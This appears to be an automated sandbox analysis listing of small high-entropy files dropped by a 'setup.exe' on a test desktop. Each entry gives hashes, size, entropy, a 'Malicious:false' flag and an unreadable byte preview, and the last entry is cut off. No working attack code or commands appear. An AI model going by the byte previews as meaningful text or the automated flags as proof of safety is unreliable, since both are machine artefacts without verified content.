              SHA1:78B5F3012A7D9822E100C8718987AA51AC87E55A
              SHA-256:5D92FC40075CE9FAFE8D85D07CF94A5F4559DD3BBD06D2E408C6BAA6ED78ED22
              SHA-512:831A41DD55C634C06583FB9C69534411567F63A091D4744965063666EC395EDA6C60F0FB8153C0926A218FF0730322443BD5F0D8A14AC9B0FF4D933FD9EE2008
              Malicious:false
              Preview:<?xml...Yq.)..t.l..L }..6...|..dz......`n....g.,K0}.=.....*mx..}..:.:VY.+a.cul.B.p...T.....*../m.3..~.....kWH8..f..(P.(..N.k.1O.i...qpx..].jS[g......7...q....W.y.....[..q5...S...f`....>1.......v...a,..G9r.N...n._.T.<b)..9..?......$E._ @...i.....I.].Z%..8...r.{...wl.:....LU.1.~WQk..n;.uh...8..N...P..X.Zx ..X.0...E..w*.U...u..=T.....aig...5.5...,..z.jW[.m<4..^....Q_.~..0.....@..'.^..I....I.....e..4.v.M....`..lh.W......:P.Q..s.+./....\k.....]*.}...\......G.U..<C.AB].W..!..._....:Oj.#}D...z..d..q...<RQ.g.}.!?.e .[1.....9..G..>.4I.A.....?.....'....fh.....M<....@...........M..:o..b.v)^....Q...#..4.q.U.h...&....3.<m.~.....R..'g.I]r`..ip~.k.s....D....... ..6...v.(.....pr..6........%.2.......W..4..V.].|..=v......K.8.....X....[.....S.....6.....D..c5..&.....F.. *.....&.....y.*\..g...L.D...0o...qY1In..+>.v..7..<.vF!.5.._...f.F.F%hC.........p.~...:..p.|!51.9+[......;...@.)._2..9.h|>.c.eW."+.r..,.....;.5....8.bP~.$4B...<..i8.....P...G..c.1&\f.gO....[.|
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1742
              Entropy (8bit):7.8835434246913385
              Encrypted:false
              SSDEEP:24:qtjONu4BdoMeW7qJRo/olK1S3XIM7m8oUZ7sqk8eSoXHl0y7sXM+zEDc8fvFBd1k:PPrbqg//CXI/u7hk7SoXHlXEMhTtoXD
              MD5:221E9385F25DC7201712DC32F39827AB
              SHA1:76DBFCCC787D67753F48AC95506F6E9434679F56
              SHA-256:64CA1760470226CE3FF5B6018BE588FCC4A1B26303EFA8BBB76C91012E9D860F
              SHA-512:ABE29F3FBDD58EE94B01F7ABEE8B7B80B4404CAE3D24F885DE8A31950FB044BD505A2F85E043033DAE78842E46EF0A311A1307493331C421A0809C6D17A7EDD3
              Malicious:false
              Preview:<?xml.........|td<.o,N7..m...9....,....!w.....g....)..V.H.'... ..b.oY..`....42.+mS..1,[.....A$.,X.U.......S..ZU.z...+6...VT..y....O..-R....h......'..+Pzb'.....8*_8....W..7].o..m..f.+2.B....E....}.]l.}.e|O\/.5...}].4.G....,..X.....2.3........C.f..I..@.:.`...jn....O.'...V.?.OMuo....V.fd.F/.d....K....|..$.@_[..u...gc.G.+....?.y......qx...^3........v....[.#...c.G....o.$.....Q.s...Y.sX\.;`.1.O.........."}.oN...{;..P.K....9.J..gX....4"._ikG..!...OS.W '....u..,.............#..e2.....;.5.p...R#.L.,.H.N./. ...[.....8...{.@.4j...........'D...6..#Jz.....i@.]...s.t`.q.-t.....*9..u.9Q....Q.O.s...m...6o......r..D..1._c ..#.t...:......,q.....[.BzM/.mk.j.*..UChCO...B..)......O@.e..".C.|Q~.I.4.....Q.X....||.....S..J.;7..hi.c..{....{OS..K..\.K....6)/-.xP.....!..`.h...(..SAS.]...5........BV.H.v'.."...H....9.. .V..n..t...(..u.n?..}.....k..u5Xm.|.~...|......wx.V ..C...J..+g....@.kS...P.......Z..b.......B3.c6.<t.O.}.B..r.O./....../..B5+.]+..C..8.e...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1691
              Entropy (8bit):7.906934521260765
              Encrypted:false
              SSDEEP:24:gulFUgSQgmPVedJxAtzh1KNQUZZxMqD365N5t/+F66LpV/Cfm3RMR4r/6/30hXfB:lfVVmXx0g2qsxtiTwmhw4r/+khsqD
              MD5:65BEFFEB72EC0EE5DF9A75C224EB1732
              SHA1:E44FE059E02232737E666AB8A43147A9BF8C0700
              SHA-256:253089D1AE93484FD84DE39C890ED2F93041E462A64D9402542B41FD2CBB554A
              SHA-512:5BC7E81690375121FC05D283AAB0CF26A36B4FCFF92D0642AE1AA9FCE1AEC53704F3978AC00CD1298070027F485CE5399D56125E02518B85FC812A85EC2A59DD
              Malicious:false
              Preview:<?xml.A..sgL.H.!..T<?..O.$%....m..8b....rS....J.....I .....m..i.P.x..z^.......u@...........r..L.)...C..P....^.O.T..HI.)..gMQO......Gk.E.V..k....J....A..v...U......w?^...'.0"...l^o.|.*...... Lp..2....H.z....|...X..F.$H...o.. .R..r2.e6#a..;<....]...;.Q.t0.]xpo..0.+.<.{.....!<..Q...f....<X..G.x%.......m...L.&..g..9.r.8)...b...W..Ov{\.....?v...z&.d..:... D.|.Ym.............#....2B.,......;../...fJ..1..7q.^.......j.....<..5E...W.d.,..WYpww|`..3.........9.....`2.S..r......AL?...J......Dh.?...bp6..1..O.#.#..u...".X.-|$...xp...`.....O.......U.o.y4\..jLm.......v.1?..*........{n.gN....P.D.k..,'....3d..t."S....... .(.f$.Y..;..X."../VR....8T..).[....g.....G:...v..C..l.SG.;..B.".....%..@n..>...@.\3..1J.c......6.V.e..n.Up. Ma9...U.Z...N..O..r..(.Q.U.._....^..s....<.,)|...\>....M.n+]K..&..+..8=.........Y...M...tez\..bR.AK0G...l...97c.......q...x...u9..w....-L.m`..,'.7F..ih..m.x.z....t..^).X.......kp..7.rl..E|3....V..E.=./..}w~.TUb.].8...$ZSY.O0
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1728
              Entropy (8bit):7.879925938151408
              Encrypted:false
              SSDEEP:48:+e8O4qzZJci5PfZRTQawSCZjzFNlP/AhfWGY2E8DRf74D:+eBb5fZRTG9zDlX4jY2EeRA
              MD5:55AF2E7A5E7580512C4BA0477A0D655A
              SHA1:38D14332438FA2EA8707B1FF1B2ADBC59BAA6812
              SHA-256:52C319BFB1D57BC94473A123150997D757F96DE34A09ADC217762449902CD400
              SHA-512:C66CAE1FED78ACBA5084098DFAC03F9D10C57580A84660B02923E86BA4864AE815D00ED82DF24E488E4EF1A27A8E1241E454D92635D4F9BF2574CEC84662F0C8
              Malicious:false
              Preview:<?xml...<..N1V.k....~)i..R&<e<.9..H.e.:.4..."..4.T|;I..[p..l...7...2..}.[..E.9.B\...x..Jp..S))."g......rq.A...).g....e{5x:......IFx.....E......h.....IQ...G....P.n=.:.?.......p.I.`..eS..V...C..K......8r0*...R.n}..."...ol..d.._2...w..j^.;$........U.9...V..'<.7@XH...."..Y&e..V$([......3g...(K...`.F}...(eE.EF.t..9..;.6.S..`.j'.........F..../.(..<...G....).........L.1.D.'... ...#8.......w.BC. %B].j....5.P...o....}._......=q^.7....h.....&....2....nn....E...y.u".....O.SD.,G.VA.f.J(.}5.4-.C.P. .. ...R.?.g..1.GS..n.~a..d\Spxy.3..5qE0.m...K@..%......#..4...~?nZ..40.C&W....J+ =.KVQ~oFmE....k..H..*}<<ggd*.._..E..%.!H#~)Nb.nvy.!.ve....['jY....-...t....Z).........&..4GZ.F.Gv.cUN.......U..X.1t..y.z.....Tc}.B..]w.^..[..M6....Z....Px..^.~4.....^...j51..Z.P..H.u....xh...k`5...;q.;.....Wo......c....&.....k`@..G,1.6....^A.5jez{.....}...>.%.>@3.)..z.3..|Rn.Q...KM.w3.z......Ih..V.Q...F/.......Gnp..1.(....x....,..R....y.(,....p+....t.....(...*]....H..._d..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):7.872238571864981
              Encrypted:false
              SSDEEP:48:QGSMeN7wYoVH9f1phOTDP6/FwB39aOtHlPINwMxgD:QGkN7QVH9zhsi/Fpy9n
              MD5:93D06B1E514709BAAB9A6BCE3632562F
              SHA1:CC8CE686A379734E90B6423DED892EE83A6FB8E9
              SHA-256:4E17E1F647AC216F4CB8C3AF6503C621FCCDF806CA2D4B911715F504E909F349
              SHA-512:6EDD9ED881665A82B7F3BB8A33B1D6EC8045A855B2A2446E62123F746E5DBF92B1DD46CDF55879F9674B11B10D97C08B76E98030D0FEE8AE2827128F69B5F7D4
              Malicious:false
              Preview:<?xml-y....|a'...@V..nE\..uT.s.X.....zu.I=..cX...t.....!..\&..R.a...c..Y..'...Q.F...g...@@..2.6...,..n.f}f.3.W$...$L.r2B..5....R,..t.6R|.hHd.H.P;D..}B.rz.&.v.q...H8..G.cd..b..S.H..8GJpx.R.Wd.9..Z.......*...}.+...f[.b....W....X(..K.a..-.....e.......N....Z..K...$.Z.u..c.[D..9..m..v:...9..p..@....P.K.A[q~.P(..J!.C.?.LL>.,.31.Gi.|..........P..g...0h..)(.$...N..........j*}.z>j...]1..98...*jA.. .......3..{.k.Y.......2rn..vU..\.A5,......N.{`...*d<.)..<H.<o..ms..k5........p..*....+n..F.r.e}..+\.:NY.m.z9nT..dqXHA..".]k..S.33..."...E.b).3.FF.P:)..K2$:qt.B........"I.....J.....Gh%.V..U......1.vn..,...6v...3..^k`.Z.N.E..Y5yJ>..OB..+..,4.tY.....Sx.....U<....U.C.%R.,.y...LQ$.Ei..U...p..-z.....eI.....^...<|\...I.....Ji.....5;`W...}...../F.V.H..Y:...R|Q.0....X.UZGjl3....U.N.}..S...........j.<....,.D.&..Hm:,L.Z....Y..x-weA3<.h.0...x;..Dp.y...0....$.r.g..?...f..cu^.|&1G..R.....HI.(....S.....0.:...[.........@..J..0k............T.M`..8...U....wfQ;...IGd.a(
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.8903094547525825
              Encrypted:false
              SSDEEP:24:lQ3e72qOyalzAdrT/kGdKr5J+94kqQG2L8pBj4MAlb2Y6nisyy1dpcswmmymFc+A:lQ3erLzd7394krzio2R31d+FcmwD
              MD5:08E5E771A6FC711BBF4FFD31F863695C
              SHA1:6C75EE8C2A9D9EA8C829155F79F3B0D2119FC67C
              SHA-256:69E1E498FC89276DCCCA3C827E126D8653855A609492AE36F791325868C6CB92
              SHA-512:FA3D26101707B93A53058FB8EC0DB6B7C17FA0B5F3272734D7AF068B9F2366D5F3E05660770C67480B35470543E3013A5F53550FE3768DADCB8C9F3B98266771
              Malicious:false
              Preview:<?xml2l)...%.2SU..%.b....lL....<..x.F&........\^.......=.....[!.O0..f...j]..0...,.r.@?....D.{r..C..........o.A.Tp.t..T.......j..r.4..Z.;...eU.|..4M..2.`.:....8..Br:|.~..)OV..r.+...h..)...f.Y.........l&1.Fnt[..}.X..........+.WT......b.t]....X.>.?z.4#F.v".+.^.*.;..f..j....Kf.U.Z. .2.....{..))........KQ..n.*.L`.&um..8.G.4?......%...`Zo.FP..M....zy.{7;..s.N... >.....\..}.%#C......<..KU.J:+n....t9.w.P.b.W..d........I.1>.I..\..?....T.Q9.v......k.6_f.P........h..".5.L.$?.1..1.......g,...*.\.+/.......{.i.i1..s.`g.W.Ck...Vs.t&}v.v....y.(..1.........<.........f:x ...X..u.{........=.M0...8,O..k.......fM.}........m_Gt{.....x.2....v ...a../..Z.Z[..cQ.........F..9{OW..........^1...U/7.N...\..Li.B.R..OF^...Whb.NT2v....3k:Ne.2..N.=a..V9.z...A.0..nJ._..l..N..'........E..1.....N.0.:.U...+i.+..5@s...:B.Q....*.....w....".G4....H..~p7..O.-....iCpZ.....YM?.9C..m..".M.e..mw...Z=....&lA.r.X)l9..Da..i..a..V.9.Ni.....RF.zJ=.O|_....T.T...3s.7../..(Z..Y..Y.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1711
              Entropy (8bit):7.879015243363727
              Encrypted:false
              SSDEEP:48:ZRetDGJxBEAXXs52Iy7VXlT++2tEm3Va/D:ZReFGJTx3RZ7m3k
              MD5:4F7E31684605CFBF45521280F4FD50DF
              SHA1:25D525F7E604E422EEE86E4E7C20E6DC6035D4BD
              SHA-256:B35108A7F5A4EF761681CF82FD46D0088B8E16B782E51EC6E2AAF2D176662337
              SHA-512:204231BE426BD3DE4F9D7F8229F9106239FE1B8A4A6DD0827A9588EB6DCB9DA87F66B7283E1AF36C80EF1861D587C300F0F687E4AABAFD170567CC0BAF05C720
              Malicious:false
              Preview:<?xml.!.;<S...B.0..z.9......M..7..^.S......!...g.vj......7..]h.\....X...e.X.c..e./..._T.C........2Jh+>...`.f..).n]..3..~.?..-..i3...Z.....)....E..|.H.hS|.5...r..Tm..}.Cg.w..^wA...l7j.....;.......xL...a..e}....t...4..@.{.o.S:aK.....]}L."..w#.:...:.\LE...H..."...n\.'D.##....1.(.G.7..*.1y!..""......z..S..i....VI.Xb]{r>.v....z..a..5...T..U*y.U.<`.e..a.`o6.be......_...'7<.3a9g..F.C....\.w"l.....I....N?.....e.....C.(..^.[...B...Z.....D..5.......7>i.f..8.F.43.........XH...C.....5....t..N.Q...G....u.b.{...P...Y...\...Z-..N..10.KN.(..P..hJY.W.I....f.+......t...m......>.?]jY.HL]....\.>a.Pgu.w........lIU.`..i.?zD....rM.,..[V.l.U6}.....Z^d....mph..^..:,#..v......y.`(]...VG#>\u!..z.",F| K......4X..J./..6{.yn..._.%..6....1.-.vSaA..2..H.....%.....>.Crp.7...U^...^....b!..rj04....U....9.....Zp6a.fM......%). .4..I....q.I.....+...i.3.=.w.^...........*\6....^z0f..+.>.7{"G.4....9v...9.H.... ..b."."y.&.xb@OM.y....[{....&`.R..*7.Q.${..b_2.[6......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1748
              Entropy (8bit):7.890714722062773
              Encrypted:false
              SSDEEP:48:3lSTsiGJxGyAXz2X7DtAAFwHj1Ukjmjg2m4P3N8HghD:39ULz2N1FURmjBh3l
              MD5:4651A6A48330AC965F12126475B30179
              SHA1:FBF66A3816612F25D5EC95C5EF3D49FE6A846C57
              SHA-256:AE0382A0CDE05B74350CE2D9B5843C6BD9624833615F2556232344FB069CAFB9
              SHA-512:CF865D16C36946851EF4EDF97B563B34841429C12D748C7D98A45C5C37F1B432362B93B752912DACE55C9DAF87D219316561749E094F9C57CDC028B618C64349
              Malicious:false
              Preview:<?xml`X......#E3.vl8.1TfRd;...c.y.R....F...-o.... .#1.1.?.........6S.}..H5...._.'O=MY...I.../..v...D~\o1r{......AtW.nu.,.....t....DF.6K..;hO.,.....*.O*j.1nEuk.:S.....<.v..2....BC....L.R.%......(.t1c.<..>........7..6..3.....Y......4.w8A...zx..P.9}.;...@.QA.m...~....<.0.Y.0geerP.-..V....6......Iei...s....z.z....4.n{}.0.x....?.H..k.....^.7.....{l,h.....U=.wk..;..h.... ...-.....P..%....DG.5s..[.Git..4}$...m.&...Dq.j..g`.~...3.R.U.!...S.4^...0|..B..........u.6..~0.>o......o$..g..}:...j..W..[.....+......]y..-....\s.b..........U_.....a.p>....\..>.<.A.....l....`v.......<..n..7._.C...pm*......i....n..n...9...H..yu6..S....t..d.....9cTa..~....N..)B....mq..H.M....P<..........A...... .....q...u.<gsT.......r.5...3I.....Y..A.L-.p. ....<=.' ..0.=.-.>z.).N.>'l8F-..88.0...y..{.[.!i.p@!$f4..$.... ......cJ.d...aY..KI.P9..QY..H.U..|u.....D....z.....k.......).C..<..b@...=......G-u..Q......../B.aF..6e....JuX...KD..+.].L..$....A.C.....*/....d.....!;..KPG.|..(\
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1733
              Entropy (8bit):7.8909463396072
              Encrypted:false
              SSDEEP:48:JnZVMM9O2/o90emKFJIfasSTrVglYrXPrpD:NMiO2/owoyjSTiCbd
              MD5:866DB711CD246638137B53559A12CFF8
              SHA1:EB2F8B3C27522C3C7146BD0F42647157CC16E67F
              SHA-256:9CE6D7B3BF5AE0ED0F6E20BFB3A1686AF17087E0BC4C75F1CFBD9D09F8588B3B
              SHA-512:36060E26F950495026C838B9C19CF1646FD78A2056F815F1E907C6B1423DF0C82220514D98A783CD7B28F2ADDE10D6944561B37080B15395555480E6FA126CB4
              Malicious:false
              Preview:<?xml3.<.b...6..Z.!:%l..p..u`.....z...^...Z.Ad..e..xaRZ>..B!{Z}.nBK.h...r.Q)O.G'.ZT1...E|obh8.....%.s....Pu.p.n./...p.4O.w....F=...e\.p.a...U4."u.Z.=/...%.t.e...{....+.........E.C.2B %.....;....._,n.....D..+qX..=.5T.(..&...a}PD.l(.....r....>`.. .~)\....v...O........7DE.!..|...qI...U.%.....RA.......(.f"....P.0...#..@.....a....f..BZ.As...j<....,.'.X=|YV{..u...u..n....)..9.t.}&..r.N.2]C.+(.|........Yj..e.0)...=......j..ZF.....o......d.A.=7.}#..Pj....43.j..hq.%G....D....Q`w...Al...^_:Y..t.4 6P.>........3!.A..?P.P..n.SB$V...9.Id.....2....ug....ZL.OhF...i.....wy...h`$.._..ck....4....P.+Z....I.p_R.e...7...8........h.uK...Q.[n....h..u..m=.A!4.0X..p.y....P.....mS.T..V....../.E.V....v=.p....H...Y..0<.y\#...5...ed.A.#..p.........{...>.VWx................t.=..K.p_.......4..`fj8....*.xrEh...Q.J..+.C#..WZ..]~.M.|.....u.i..]..'.|.k..=....g9......;. ..J".6....K........%.!.......u...wR]%c`'=.t..)..1o.........C".........l9..{.Q.Hv.3.!.....hEg1f....R
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1770
              Entropy (8bit):7.861923799811929
              Encrypted:false
              SSDEEP:48:sOuXcsOsw47S7gLMwUytxi+iuuNBYlSRrFbJ47C0vZAo5PD:yXcsOK7SELMwUyPyuuP88rFWDhNx
              MD5:5920E8CBE15A107AA013501A49B255EE
              SHA1:5CB81A4BE2D3B2367FC78ADB116DE0A8D8B4C94B
              SHA-256:645CF96AD4FD26ED58BDFBDFA5F586B5FF9179EA9BE1FE1C24637D14B1DE9443
              SHA-512:53B3FF97BFDFC8EC2F1508805276E02DE21ABE2323ABB8DE7C463623F438D71CD85D8CC8C1CDAFD618E8EFBDE3400DD2F15AE0F38D377A9EABC2C85FDA6CB08B
              Malicious:false
              Preview:<?xmlZ._..m..T.)...)...-....k.+;.s.*.Z.v....i.!.V..DB,.$X..#.......1WE....Z..Z...._.i.}vT./.....>.B..i........J.w...4\./t..Dm[..i...2.$6o6I ..........'\......d....lrFi.....7...c"...1.<o.u...U......G9.........!...p.x.Lw...M6..I..Lk1.S..8..{V..a.L..(.......w.~.KE......j..-.q.["f.::l.v..Q.qq..-.b....S...Ti.....l.i.s.9....=.@.*.....>Va.......LU..@]Ob.o... .......h..|.0$.s..:....G...v...Zn.A....BK.6yD......g...|F....p....O.P.C%.S%.c..w..O...M[T.6.G.XH....p..@!.S..a.\ ..Pw..eC...!$L...4..3$......g...e.. .f..I-...n.X.J..4v,......#|.4..<n........3.G..\..r...S..8..(iC..)EBl.IxNn....(....G.s.......*y&(.3...........?.io....x;.bl.....3......LRD..3Ub.*.....6..p...n[...r....W..yw(.x../.6...C.uK.!..N...h3w3\.Y......Y.w......(..u.........(.~...S....=._D..W.7.....h2R`..g.P@.\Ym.M.....A(=..h......K...#...;.}V..Tb... .B..y*..XeK...\....N.X...!BK.o...Cvf....7.}.....mL.|.....S..%.....m.=B.d.'.r.*9X@/l........-!v.A....f.....a.5.6d...no.HI/.!&..Yc...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1715
              Entropy (8bit):7.904781700706364
              Encrypted:false
              SSDEEP:48:n+ITwAqFRHa/vtJXFnUuB7AgrM8svs3NlCEepDD:nTRWRH4lZt7Agevs9bAP
              MD5:4350F21DCE29A04A9617B642C79E8724
              SHA1:38C6FA9D1F9CA9A0892682864BC34200EE6F12DC
              SHA-256:146C8C64A0BF278E626FDA0B7DF9B3664388128C0F8DFC6BC1F882EA8C731AD3
              SHA-512:D14E5AC11B0360A99DBBEF6ECAF947A7D04567C0192A9BFC5FAFE1B6F18A77B922891BA1D31ADBF9C235897B4BDEB3C494C21FC7B46DABD9129523C844DD9DA2
              Malicious:false
              Preview:<?xmlZl....F.>=X.).l...;X....{.(CD?R;P!..Q=...`(G<e..d..^Qz..~ .(....=.........YR;U..+k..-Z`.{l4.Y~A...F..7+.s...U..f......5.35.7.s.L.VMGM)..I..X..l2C.e.....+..]....B.....'m..G....pt...9.U........FK..y...2..s{.fNA.2....i..u8xL.N5.h.......)....v..Se8tM....9...t.?.is]m...q".?.!qY}...n......?I....&80n.>.?..&.P......v@v....|#S....{.z..A..e..s-..........C]<...dO./..]:w....^D...6.M.....oB..4...*.K...>.C.R......e.n.pWy....@..K..RJ.X|....FC....8f...*...{....<.I.7.....q.....,.......9*.......%....x..\:\.!.j.L.iF..G.s..K.Y(!....^u...#6y..t[.`...!=E,.$OM..U..n..&...O.3v....n..r.P\......>....t.yZ..+S.T.7bcL..2......X@m..%.r....R..Yrq.D.2..5n..:..u..G.%..&.YL....I......VHwE...L...S........=.[.a+Rz. .....8%VG.....".a_..J...."..Z....."t...T......31...!.. ....4=,y.u......<7.Z...p.T....\-.D.~.s.{.z.R0T.|...]...e.F&....C.........`.@...7.W_{.w....W.. c..........D.d..q.$...7=..........6..C.i...V.\.5IQ.s.........:7....R.:K#.^.K+t.).=(.Q4..+.]..9.H[(^....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1752
              Entropy (8bit):7.887730399148488
              Encrypted:false
              SSDEEP:48:kxfi5QR0nFSMTa6Qi46NoV+nGlBHWdUeNsIIR5TzD:k/a3G6yV+GDDeNRIR5Tf
              MD5:093334418716DB2948BD521767DB59AD
              SHA1:CF47412352030EAAB8D19F3ADE1209A364716D2D
              SHA-256:FBFD2239CCCFE52B12AF242E2FE09425D8C7964C13F0DDFC80B74C2DC987604A
              SHA-512:41BA8C2841843F933699539B2EDFFA5E5CA8D3ADC3C1E5DC9576AFE0947F2F3CA6A0AD0A85F56E0E627CF2CE6DA3476ECFB0BD7430861B23BB289B70B74EBE6A
              Malicious:false
              Preview:<?xml.........VN......<&......"1e....k..<..&..u96n..k.......@.g...C.u..x......v.4.:..c~J*.Z...?4w....6....kI.`k.h..j+.._r.=..d...j8..,T..AO.H9........o...Z.Bt..!..K.N.....u.k...Q.V...8.......4.v.~A.'.$=ts......>0........F"..yI.7.^....+.u.y.X../S.y&B5U:w...5.......W.....X.PZ>.....f.t.C.<........p..b6..~.0A..X8.p.iF..\..p.N.O.Po..:.zX.c)8.s....7..sip.......X.F..7b9...K.i.....6..IC......nB.}`.u....Z!SP..=\^.E.8l....$...F9.......2BdQ.....c<..........^.X.... U.! m58.....[g...].S..Y..Z....Ao|..?}.'.z.q....),.A.X3.8.._.....<.Q.#......H+QmOHwY...ilj...h.z.)%....K|.........c.G'....R......*=...=.....w....0.go......\V..(..+.J..!.....)J$r.=(..N.d..W.>..G.3s.D@XE...R[.....g..X.f|...;...|.MJ(.zn)-.w..S.|)...Qg...`.W~._7.TY..L....$..c.]....v!..j$.K..U.SJ...C......n...FGOMXm..)..i.S.KK.....I.....XA6|.....z.n.Cuv.W.!..W..;\2t..D....,z..Q... ....>bL.)r.;.L.!.D...<$..}.........[.8o...,}e.B<h.`.% }..g.[.......@..d2.>........53U.!...L...:1.'D....ce.O!4m:..#gbG...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1738
              Entropy (8bit):7.896615560274767
              Encrypted:false
              SSDEEP:48:XsF62hAnWf9BYX4pK/FqdYEeubGvUDwiIOrD:aVhAnWf9DQ/QdmCaUVIOH
              MD5:C37CE843D9688229D493A83C2B087BDC
              SHA1:0370BB5B75D9EDF09C14FDBE66504E90A3ACC616
              SHA-256:8D0A88779087EBC734473F468D97F4A16BC19D8C673AD1EF3F13995FD7F41F8B
              SHA-512:FD19C29A7A69AC6B476DEA586BB0E10D768230115D40B0C95BC0479F21E619809DD0D2C8BC6D8AB5378293343D3480AAB2A6DBE39F41933F4B397B6DD6858FA4
              Malicious:false
              Preview:<?xml.-q.+jJE..j.0.hn.~.7.....9.*...3...".]p.k.7T..K@~..%....w..=..8ei1.Y.....C..V..k..<Z.F...........W......D%l......(..Q.>V...g.........U .yL...F.K.....v@....1&....z")P...p&.......D.9&.....@ip,.[.pg......\.M#..=6E.4V..tK".5...=_..8&6.?`..@.YD.....ds.8.a..p.].rv.Q"8..H...51..]u"..5wfH..x3.. .T.J2..n.*4.S|..,....j.`F....L....Y.......E..F.O..l..z.`O....B....h._.R.w./.(.....I4P.P]@.a.K...Y.^.:..2..m.\f.....Ac..V......<.......&..g^.o(,...m....'s.e....1....p.%Nv...&H......X>..%y..e.....W....tL.S..M.=.....i..2.~.!V.[...[.`....*.b../p./......x.s..J4.....+?....@..".}..!......w..2-..T.uC0#....rS..3..A7Q..:>.#R9..w=n'..9..TA.x..}..J....hy.JU..,6.......,..a..ux.x....@.\1..0O.G.^Si....w..O]4^H[=Z.....7...,..*'...E@\.?.w....|.J.Y.x..Kq.Q..vt......:.[.......9Q.....fH...[.`%5r.{..`&.a...|@..:......i..W..?.......V#....].....-...V'|.n.......].c3).G..PT....T...0w.k..:.k.'.{$oY.R.Z.W......'..R....#;./.....|8.^.h.w{.i....%.O...A.9a.-6....]j....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1775
              Entropy (8bit):7.890264709781227
              Encrypted:false
              SSDEEP:48:CMFU3gPaRPsjhcJhkYZgG1uAMlQjzj02D:CMFIn9s9cJnZgG1uAMKv
              MD5:291C6CC28BECF10693CC985C327BB20E
              SHA1:874A75E41CF23896D72E978DE37D417393E1E85E
              SHA-256:4FEB4B9C04ECAFFB179CDD5F474190E436496B5B99E0AA79A3BEC8132E5E806B
              SHA-512:C24D47813880E3E65DE0D42ACED04CD21E290664754E49A3D88AD932C2523CA6FED093E6B16D060A307E22943E9162F18E1A7D27D995B52C1F8D53225B52916B
              Malicious:false
              Preview:<?xmla.;..=..=.G4.jX...a..m..f{.h@..D...WH#.2.....X.y..)..cE. .... ?>........E..8.@G||....\$N..R.1}h.......,/.WNB9.....e$....?...`.v....FBG.zO!.9.."j.;.uAx..m.P...4.W...^....*VN...L.......6x.c<[.l.l...Y.F...... i..^.T].eBL....7R!/..)5..I.'ON~.g.Tq.^..b........r.mKmj.I1)..\:(.,.......!.Z.w..uW....RB..|...'....;...L..G.......k..C..{..!yD............~..o...&.?..@...O...VZ..@...[....O...<..o,.5~K.W4.......5.(..&...--.Y'.'....-..t4y\<...@..Zaz.;?.fe..."...R.......!....yO....y..@h.qa.v..f(I.R,....+..._c$.YT7(.w1o..A.x....K.......c=.m2..F.....?2.K.E.k...J.z. ....[M-..:.z......n.^...z..C...#.;.fC..S;.*..2..w.7..... .U.cj.............a...To....+.6}..HJ......q.._..0Q......Q..'..lZ....g-.. .......x..C...0H.q................|w..\J...B..6. 0..q.^Q.{...j.8+.j.....[,..V........h,.ujV.`.....q_........e..K,.}..%k..zpp.....a. ..?.(7q\u...z4GC#.....?\.+......W..f.=.].?.x<.IyG..;...}eR..<M....d|...T.(Q...g..%.|4._dg.#. .1.....L6Xh..e...s#=..8.3..\.ma].H."...M..X.IK.R.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1723
              Entropy (8bit):7.884517055431161
              Encrypted:false
              SSDEEP:48:y6nv4AIAFnJm4DQDhHlPvY0lsBXZUr6o0i2WV5nD:Dv4zAFnJm+cRlPtkJRV1m5D
              MD5:E368D53C8BAEB7D9704574778E043790
              SHA1:B9BA0B0A2C353283546349B7ACC97E1A763BD981
              SHA-256:ADDA9AD34616582663EAFFD5A6EC8002A908199762A55D67186FF039C10FC902
              SHA-512:3CD635DE12AC67277B75CA0D480E67E9D4C300AE0068FA8101333BFFC326EB2D7DF5DE2D12315F47629B678A81FB6302DA45004FBF6AF0A39C2A0EFFB16FD21A
              Malicious:false
              Preview:<?xmlR.)...2../..p...EK.........ZZg..jQ)...?.@....Oi...s...V..5..2K..D...M;]I'.-..1..\g..;.GH+....P....%......u...SE\../.Z.. e.~.@.z.F..J.6......m.....H-].~.A....l..G|..%.4o...P..!.......C.."Df..#N......>+..w.6..H.....P...|.(.{.m.O.,.Y.w]D........zi..c..Y........U.vs....{..xYMl.I.N.....U.....+!...F.+....p..SW.J.......(...Od..J....^#m0Z5.M..B....E.....Y9.kd%.(..6.3.......+k9p.u71}.z.(4:.F...+]A......`...&.+...-...Z.H...N.],a_..5.Oj.4fm..?..........:?..q..`....@..(RPK.~N..B.B.2W.............t.[{,K.M...<..........P.Vsp..!yx..&.$.R.y...z.....G.....(XW.M....i.s.0H.....'...'Y..W.....8ce%.T...xvQ..~,.......^.....3j...s.q.#g..u.z...g../~.\Ut/...O......8..#..>o.../..~..w,._!.R.lA.Z.....99.O....}.1I..3Zw.Z..=.<;r.v...1t...F.6..x....'.+>.6.C.....bRr....>.k...S.h.,%.6.R...yp..1`....)...$-.q..... m...;. ..0j.!......j...=_.R.X..5....zl2Z5..].%.|c|.V..... .Z.ej..].^.$p{.'(U.D..OF.z..A.r.2+......Q..x.,].Pq..Z..?..M.c........un"B....9....v.........X.^...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1760
              Entropy (8bit):7.8882280590890534
              Encrypted:false
              SSDEEP:48:5coH8Op9i2B0Zat7tkMgBZftFLDP5POCD:e1NYt5kp3vNOK
              MD5:6E79B95C8445F1EDDE5599AFD8B6B88F
              SHA1:58C98650E4A36516F76B42D7DBB86FC572CE52FE
